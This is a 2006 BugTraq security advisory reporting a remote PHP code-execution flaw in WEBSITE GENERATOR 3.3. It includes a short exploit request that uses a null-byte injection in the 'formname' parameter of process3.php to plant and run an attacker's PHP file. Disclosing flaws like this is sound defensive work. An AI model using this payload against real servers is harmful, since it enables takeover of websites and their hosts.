BugTraq
NSA Group Security Advisory NSAG-¹202-25.02.2006 Vulnerability WEBSITE GENERATOR 3.3 Feb 25 2006 01:14PM
NSA Group (vulnerability nsag ru)
Advisory:
NSAG-¹202-25.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product:
WEBSITE GENERATOR 3.3

Site of manufacturer:
http://freehostshop.com

The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is not notified (there is no communication).
17/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/894.html

Risk:
Hide

Description:
The removed user, can upload php script from other server and execute
custom php code on webserver.

Exploit:
Method GET:
http://example.com/files/myforms/process3.php?formname=attack.php%00*nam
e[0]=
Link:
http://example.com/files/myforms/forms/attack.php

More information:
http://www.nsag.ru/vuln/894.html

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus